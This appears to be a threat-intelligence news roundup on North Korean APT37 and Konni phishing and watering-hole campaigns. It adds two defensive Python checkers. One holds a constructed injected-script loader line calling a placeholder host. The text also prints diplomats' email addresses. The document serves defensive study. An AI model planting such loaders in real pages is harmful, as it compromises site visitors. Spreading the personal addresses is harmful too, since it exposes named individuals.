
STARK#MULE Cyber Attack Campaign Tricking Koreans with U.S. Military-Themed Documents

A persistent cyber attack campaign has been launched, specifically targeting Korean-speaking individuals. The attackers are using U.S. Military-themed document lures to trick unsuspecting victims into executing malware on their systems.

Following the incident, Securonix – a cybersecurity firm – dubbed this sophisticated cyber attack campaign as 'STARK#MULE.' The full extent of the attacks remains undisclosed, leaving uncertainty about the number of victims impacted.  As of now, it remains unclear whether any of the attack attempts have resulted in successful compromises. The situation calls for continued monitoring and vigilance to safeguard potential targets from threats posed by the ongoing campaign. 

According to the report, “these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials”.  APT37, also known as Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a nation-state actor affiliated with North Korea. Its primary focus lies exclusively on targeting entities within South Korea, particularly those involved in reporting on North Korea and supporting defectors. 

The group has utilized social engineering techniques to initiate phishing attacks, thereby delivering malicious payloads like RokRat onto targeted networks. However, recent developments indicate that adversaries have broadened their offensive capabilities, incorporating various malware families into their tactics. Among the new additions is a Go-based backdoor named AblyGo. 

The campaign exhibits a distinctive strategy, leveraging compromised Korean e-commerce websites for both staging malicious payloads and establishing command-and-control (C2) operations. This clever maneuver aims to evade detection by security solutions installed on targeted systems. 

By utilizing legitimate platforms, the threat actors attempt to fly under the radar and maintain a cloak of stealth during their activities. This innovative approach poses a new challenge for cybersecurity experts in their efforts to protect against evolving threats and reinforces the need for enhanced security measures across digital landscapes. 

Separately, APT37 has adopted a new tactic, using CHM files in phishing emails that impersonate security communications from financial institutions and insurance companies. The objective is to deceive victims into opening these malicious files, thereby deploying information-stealing malware and other harmful binaries onto their systems. This observation was made by the AhnLab Security Emergency Response Center (ASEC), shedding light on the threat actor's evolving techniques.

The use of disguised CHM files poses a significant concern for security teams as they strive to mitigate the risks of cyber-attacks and safeguard sensitive data from sophisticated threat actors. APT37 stands among several North Korean state-sponsored groups that have garnered attention for executing sophisticated cyber attacks aimed at financial theft, as evident from the recent attacks on Alphapo and CoinsPaid.
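As an added example (not code from ASEC or from the page's sources), a defender-side check for the disguised CHM attachments described above. It inspects the attachments of a raw e-mail and flags any whose content starts with the `ITSF` signature that every compiled HTML Help file carries, whatever extension the filename claims. The sample message, its sender and recipient addresses and the attachment bytes are all constructed for this example.

```python
"""Flag CHM attachments in e-mail by content signature, not by filename."""
import email
from email import policy
from email.message import EmailMessage

CHM_MAGIC = b"ITSF"  # first four bytes of every compiled HTML Help (.chm) file


def is_chm(data: bytes) -> bool:
    """True when the bytes carry the CHM container signature."""
    return data[:4] == CHM_MAGIC


def suspicious_attachments(raw_message: bytes) -> list:
    """Return one record per attachment that is a CHM file by signature or by name.

    A record whose name does not end in .chm but whose bytes do match is the
    case that matters: the lure has been renamed to look like something else.
    """
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        by_magic = is_chm(data)
        by_name = name.lower().endswith(".chm")
        if by_magic or by_name:
            hits.append({
                "filename": name,
                "magic_match": by_magic,
                "name_match": by_name,
                "size": len(data),
            })
    return hits


def build_sample_message() -> bytes:
    """Constructed phishing-style message with three attachments (not a real sample)."""
    msg = EmailMessage()
    msg["From"] = "notice@bank.example"      # constructed sender
    msg["To"] = "user@example.org"           # constructed recipient
    msg["Subject"] = "Security notice"
    msg.set_content("Please review the attached security notice.")
    # 1. CHM lure with an honest extension.
    msg.add_attachment(CHM_MAGIC + b"\x00" * 60, maintype="application",
                       subtype="octet-stream", filename="security_notice.chm")
    # 2. CHM lure renamed to look like a PDF: only the signature gives it away.
    msg.add_attachment(CHM_MAGIC + b"\x00" * 60, maintype="application",
                       subtype="pdf", filename="statement.pdf")
    # 3. Genuine PDF header: must not be flagged.
    msg.add_attachment(b"%PDF-1.4\n%EOF\n", maintype="application",
                       subtype="pdf", filename="real_statement.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for hit in suspicious_attachments(build_sample_message()):
        print(hit)
```

Run it against a raw `.eml` by passing the file's bytes to `suspicious_attachments`; the signature check is the part worth keeping, since an extension or Content-Type filter alone is defeated by the renaming in the second attachment.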

Moreover, the group's activities also revolve around gathering intelligence to further the regime's political and national security objectives. This dual focus on financial gains and intelligence acquisition underscores the significance of countering APT37's actions to protect the interests of targeted organizations and safeguard critical national security information from falling into the wrong hands.

North Korean Hackers Attack Russian Diplomats


American information security experts from Cluster25 and Black Lotus Labs discovered cyberattacks on employees of the Russian Foreign Ministry before the New Year holidays. They were allegedly carried out by the North Korean hacker group Konni. 

According to Black Lotus Labs, the attackers began a phishing campaign back in October. They sent some diplomats archives purportedly containing vaccination information, and sent others links to download a fake program for registering vaccinated people in the federal vaccine registry. As a result, the account of one of the Foreign Ministry's employees (mshhlystova@mid.ru) was compromised. From this address, the hackers sent a phishing email to Deputy Minister Sergei Ryabkov at SRyabkov@mid.ru on December 20.

In addition, Cluster25 reported that another letter containing an infected archive was sent on December 20 to the Russian Embassy in Indonesia, with the sender listed as the diplomatic mission in Serbia.

The Russian Foreign Ministry confirmed that the attack was real. "However, the attack was timely detected and localized by standard means of active protection of the ministry's information infrastructure and did not spread further," the Foreign Ministry said. The ministry stressed that the phishing attack had no destructive impact on the information infrastructure of the Foreign Ministry. 

As Anastasia Tikhonova, head of the Group-IB threat research team, explained, the American researchers could have obtained samples of the emails from VirusTotal (VT), a service that analyzes suspicious files. According to her, one of these letters was uploaded there on the day of the attack, December 20.

It should be noted that the Konni group (APT37) has been known since 2017. In its attacks it has used, in particular, documents related to Russia-DPRK relations, with texts taken from public sources. Kaspersky Lab cybersecurity expert Denis Legezo said that Konni may send a deliberately corrupted PDF file: the recipient cannot open it, and the attackers then send an infected program disguised as a PDF reader.

Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware


A threat actor from North Korea has been found exploiting two Internet Explorer flaws to attack individuals with a specialized implant, targeting a South Korean online daily newspaper as part of a strategic web compromise (SWC).

Volexity, a cybersecurity firm, has attributed these attacks to a threat actor it tracks as InkySquid, better known by the monikers ScarCruft and APT37, a well-known North Korean hacking group. Daily NK, the publication in question, is believed to have hosted the malicious code from at least the end of March 2021 until early June 2021.

InkySquid has been leveraging such vulnerabilities since 2020, injecting malicious JavaScript hidden within a site's legitimate code to attack visitors using Internet Explorer.

According to the researchers, in April of this year Volexity identified suspicious code loaded via www.dailynk[.]com from malicious subdomains of jquery[.]services. Two URLs were identified, listed below:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Further, Volexity experts have noted that the "clever disguise of exploit code amongst legitimate code" as well as the usage of bespoke malware allows attackers to escape detection. 

These attacks involved tampering with the jQuery JavaScript libraries on the website so that they fetched further obfuscated code from a remote URL, which was then used to exploit two Internet Explorer vulnerabilities that Microsoft had patched in August 2020 and March 2021. The chain deployed a Cobalt Strike stager as well as a new backdoor named BLUELIGHT.

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 
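As an added example, written for this post rather than taken from Volexity or the site involved, a small integrity check of the kind a site operator could run against a self-hosted jQuery copy to catch the tampering described above: it compares the served file with a pristine baseline by SHA-256, lists any lines the served copy has gained, and reports script URLs that point at hosts outside an allow-list. The baseline text, the tampered copy, the allow-list and the hostnames are all constructed placeholders.

```python
"""Integrity check for a self-hosted JavaScript library against a pristine baseline."""
import difflib
import hashlib
import re

# Constructed stand-in for the site owner's pristine copy of the library.
# A real baseline is the vendor release (or your own build artefact), kept
# outside the web root so a web-server compromise cannot rewrite both copies.
BASELINE_JS = (
    "/*! jQuery v3.5.1 | (c) JS Foundation and other contributors */\n"
    "!function(e,t){'use strict';t(e)}(window,function(e){e.jQuery=e.$={};});\n"
)

# Constructed tampered copy: identical except for an appended loader that
# pulls a second stage from a host the site never references.
TAMPERED_JS = BASELINE_JS + (
    "var s=document.createElement('script');"
    "s.src='https://static.unknown-cdn.invalid/loader.js';"
    "document.head.appendChild(s);\n"
)

# Hosts a script on this site is allowed to reference (constructed allow-list).
ALLOWED_HOSTS = {"www.example-news.invalid", "code.jquery.com"}

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_hex(data: str) -> str:
    """SHA-256 of the script text (the same digest, base64-encoded, is what an SRI integrity attribute carries)."""
    return hashlib.sha256(data.encode()).hexdigest()


def referenced_hosts(js: str) -> set:
    """Hostnames of absolute http(s) URLs that appear anywhere in the script."""
    return set(HOST_RE.findall(js))


def added_lines(baseline: str, served: str) -> list:
    """Lines present in the served copy but absent from the baseline."""
    diff = difflib.unified_diff(baseline.splitlines(), served.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def check_asset(served: str, baseline: str, allowed_hosts: set) -> dict:
    """Compare a served library with its baseline and return the findings."""
    findings = []
    expected, actual = sha256_hex(baseline), sha256_hex(served)
    if actual != expected:
        findings.append("hash mismatch: served %s, expected %s" % (actual[:12], expected[:12]))
        for line in added_lines(baseline, served):
            findings.append("added: " + line[:80])
    for host in sorted(referenced_hosts(served) - allowed_hosts):
        findings.append("unexpected host: " + host)
    return {"sha256": actual, "clean": not findings, "findings": findings}


if __name__ == "__main__":
    for label, js in (("baseline copy", BASELINE_JS), ("served copy", TAMPERED_JS)):
        result = check_asset(js, BASELINE_JS, ALLOWED_HOSTS)
        print(label + ":", "clean" if result["clean"] else result["findings"])
```

In practice the served text comes from fetching the library URL the way a visitor would, and the check runs on a schedule; the host allow-list catches loaders that keep the hash check from being the only signal, since an attacker who can rewrite the file could just as well rewrite a hash stored beside it.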

Notably, both vulnerabilities had earlier been exploited in the wild by North Korean hackers to target security researchers working on vulnerability research and development, in an operation uncovered in January.

Once Cobalt Strike has been deployed, BLUELIGHT is delivered as a secondary payload: a full-featured remote access tool that gives the operators complete control of the affected system.

Besides collecting system metadata and information about installed antivirus products, the malware can execute shellcode, harvest cookies and credentials from the Internet Explorer, Microsoft Edge and Google Chrome browsers, collect files, and download arbitrary executables, with the results exfiltrated to a remote server.